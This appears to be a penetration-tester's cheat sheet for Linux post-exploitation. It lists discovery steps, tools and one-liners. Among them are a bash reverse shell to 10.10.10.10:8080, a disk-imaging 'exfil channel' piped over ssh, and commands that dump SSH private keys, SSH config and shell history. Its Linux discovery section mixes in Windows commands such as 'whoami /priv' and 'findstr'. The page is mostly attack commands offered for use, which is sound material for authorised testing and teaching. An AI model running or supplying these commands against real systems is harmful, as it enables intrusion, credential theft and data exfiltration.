Linux Post Exploitation Discovery
Description
Identify current user ID and privileges
Identify network connections (for lateral movement)
Identify Running processes
Identify cron jobs/scheduled tasks
Identify if Active Directory environment then identify users/groups/computers if in cloud or on-prem
If not AD, then find applications, firewalls, AV
whoami /priv
netstat -na | findstr "ESTABLISHED"
netstat -na | findstr "WAITING"
arp -a
systeminfo | findstr "Domain"
Linux Exploits
Commands
Redirect an IPv6 listening TCP port to a localhost IPv4 listener (the local IPv4 port forwards to the same port on the IPv6 address).
IPV6ADDR=fc00:660:0:1::46 && PORT=110 && socat TCP-LISTEN:$PORT,reuseaddr,fork TCP6:[$IPV6ADDR]:$PORT
Find Juicy Stuff in the File System
find /PATH/TO/DIRECTORY -name "FILE-FILTER" -type f -exec grep -i "STRING" {} \; -print 2>/dev/null
Find public ip
curl -4 icanhazip.com
Make output easier to read
alias ccat='pygmentize -O bg=dark,style=colorful'
Encrypted Exfil channel (USER@HOST is a placeholder for the SSH login on the receiving host)
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C USER@HOST "cat >/tmp/image.dd"
Check service every second
while (true); do nc -vv -z -w3 10.10.10.10 80 > /dev/null && echo -e "Service is up"; sleep 1; done
Website Cloner
wget -r -nH $URL
Type "gah" after you forgot to use sudo, and it will re-run your most recent command with sudo.
alias gah='sudo $(history -p \!\!)'
Create a reverse shell back to a given IP address and port.
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
Encode or decode base64 information.
echo 'Hello, World!' | base64
echo 'SGVsbG8sIFdvcmxkIQo=' | base64 -d
Helpful Commands
cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
Linux Post Exploitation Tools
BusyBox
NMAP
Responder.py
tcpdump
http://www.monkey.org/~dugsong/dsniff/
http://www.dest-unreach.org/socat/
https://www.gnu.org/software/screen/
http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
http://tgcd.sourceforge.net/